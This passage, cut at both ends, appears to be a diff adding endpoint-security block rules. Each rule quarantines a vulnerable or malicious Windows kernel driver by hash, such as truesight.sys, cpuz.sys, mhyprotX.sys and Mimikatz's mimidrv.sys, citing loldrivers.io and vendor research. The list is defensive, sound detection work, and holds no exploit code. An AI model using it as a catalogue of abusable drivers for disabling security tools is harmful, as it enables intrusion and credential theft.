[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "843673fd-4586-5c5b-8bdf-9bc5117493f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809850Z", + "creation_date": "2026-03-23T11:45:31.809852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "145cf879dd3dcf38b328d1a0b94ffee8534fa6f5d0c34264d59fed7154b5c1c4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8444fbf2-dc2a-5d36-81c3-d5f5778557f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986235Z", + "creation_date": 
"2026-03-23T11:45:29.986237Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a2482e19040d591c7cec5dfc35865596ce0154350b5c4e1c9eecc86e7752145", + "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84531396-914a-500f-b688-59b0e4cd1e45", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474416Z", + "creation_date": "2026-03-23T11:45:30.474420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5e671c37f0eeb437d1ef480ff15b855ef2fdbb127f9130443fbaa279c5a3d72", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84633318-4039-5bee-b38f-35b8ce54a2fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475244Z", + "creation_date": "2026-03-23T11:45:30.475247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d25b5e4d07f594c640dcd93cfc8ab3f0a38348150bd0bfae89f404fbb0d811c6", + "comment": "Malicious Kernel Driver (aka e29f6311ae87542b3d693c1f38e4e3ad.sys) [https://www.loldrivers.io/drivers/c00f818c-1c90-4b47-bc29-fb949f6efb65/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84797ff1-5acd-52ff-b177-b16519541de5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971096Z", + "creation_date": "2026-03-23T11:45:29.971099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb6ad7998aa1eb9c3b08cb7185bd4425fcc9c9b02ecfb4a3492e7b93033e8b11", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "847abe91-788c-5720-a276-020863f38da3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611830Z", + "creation_date": "2026-03-23T11:45:29.611832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611837Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "848719fb-9e90-5a1d-a54d-e9f29a293d35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146783Z", + "creation_date": "2026-03-23T11:45:32.146785Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146790Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b87085d408c250bdaf933642aa64975a7127cbe393023aaf53d918cd8bf0e3ae", + "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/bd6490c2-20ea-441e-803c-bc3b957dae4c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8489d886-cf22-513f-8b66-6da08cde7b85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148791Z", + "creation_date": "2026-03-23T11:45:31.148793Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f77f88061432157635b71a7c388bbd9eefbac401b9c8620d8787ee03a5e5c95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84906764-36ec-58dd-bd92-4a6d56e47dbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809648Z", + "creation_date": "2026-03-23T11:45:31.809651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809659Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdb6e4d73f7949bf58b4b854a3b85d20ef7e4486f88c2d2d02fb4922b7138dc2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "849103dd-af6d-512f-93db-f0df94e049d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488117Z", + "creation_date": 
"2026-03-23T11:45:31.488119Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488124Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33475258d25e34a019400861d377c520c4b7e516e0141daf8a6a5e25172baf83", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8494bb16-bc5a-59b3-b5bb-db814195af7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980064Z", + "creation_date": "2026-03-23T11:45:29.980066Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980071Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f6fec8f7890d032461b127332759c88a1b7360aa10c6bd38482572f59d2ba8b", + "comment": "Malicious Kernel Driver (aka mJj0ge.sys) [https://www.loldrivers.io/drivers/412f4aaf-5525-458c-b87e-311e504b856d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84b5b0ab-fbb1-5b19-8deb-2bfb214f6e1c", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618761Z", + "creation_date": "2026-03-23T11:45:29.618764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e88617bf6581b7f48ab216f5a2cf40cfa728354f81a631568823426461902c87", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84c3f592-bab1-5c28-a5d1-587304b595a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976295Z", + "creation_date": "2026-03-23T11:45:29.976299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84c8674f-d53d-5800-842b-c444e2d29e59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973722Z", + "creation_date": "2026-03-23T11:45:29.973724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973729Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "654c5ba47f74008c8f49cbb97988017eec8c898adc3bb851bc6e1fdf9dcf54ad", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84ce4f64-8e4d-56b0-9474-40395cd00e78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825290Z", + "creation_date": "2026-03-23T11:45:30.825294Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd4e5d356f9c1f4fb71f8e0b3f20f7fd40c4fac0ccb8912460301c927362044d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84cfd4c4-a9b6-5c14-9ae0-2e3ea10297ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829808Z", + "creation_date": "2026-03-23T11:45:30.829810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "70ad5c343b092a4e0738787feb772680f68f2014129e1fd6ae1eae16f475d735", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84e7457a-690b-56a1-83bd-8ab5a142465c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811663Z", + "creation_date": "2026-03-23T11:45:31.811665Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811670Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5da99b951bad823261775596d6972183897a0eb005f6158e8406008781e87868", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84f10e98-0807-508e-9e3c-f0f7285ba74c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811627Z", + "creation_date": "2026-03-23T11:45:31.811630Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811635Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42a56620cf2d1f718a9082e0ad37771d6f9c77c05cb65043043cbeaf10f8976a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "84f6c9ec-7d75-58af-bf29-0e1cf76381a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483405Z", + "creation_date": "2026-03-23T11:45:31.483409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a09bf49a5d3cfe891ac4db204c4c38a977c7bbcc6668c445c319035c1889b1b2", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8503e349-8c4a-58b6-af9c-5560dfcebfe9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474959Z", + "creation_date": "2026-03-23T11:45:30.474962Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7e3bd414674a3258be7ce384619b74946bafa218648a00c04e4e74f987f5723", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8520447a-caad-5d11-bdf5-8ad25e15a0e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.140636Z", + "creation_date": "2026-03-23T11:45:31.140638Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140643Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29bdcffcee5ddef60fa022fe42957b4309afd40ab2504f148a3eea51625bb973", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "852d5ba8-3cae-5b4d-8bdc-baaea092ed03", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492803Z", + "creation_date": "2026-03-23T11:45:31.492805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f5de6c3636e996c5173f1277e7639b84f9149229ace4582e08a8a1b14fcadf8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "852dd15a-d0a6-5fb0-b8b2-9d5b703becaf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462000Z", + "creation_date": "2026-03-23T11:45:30.462003Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462012Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5ddfa39540d4e7ada56cdc1ebd2eb8c85a408ec078337488a81d1c3f2aaa4ff", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85300aa9-a081-5a81-8baa-7bcb613c0424", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489702Z", + "creation_date": "2026-03-23T11:45:31.489705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.489712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4089a7db28609073dc3ed733ea83b6334923ddd635b7b9153196b2f6489344c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85328622-6c71-5e6e-b34b-92e2ec2cee3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472202Z", + "creation_date": 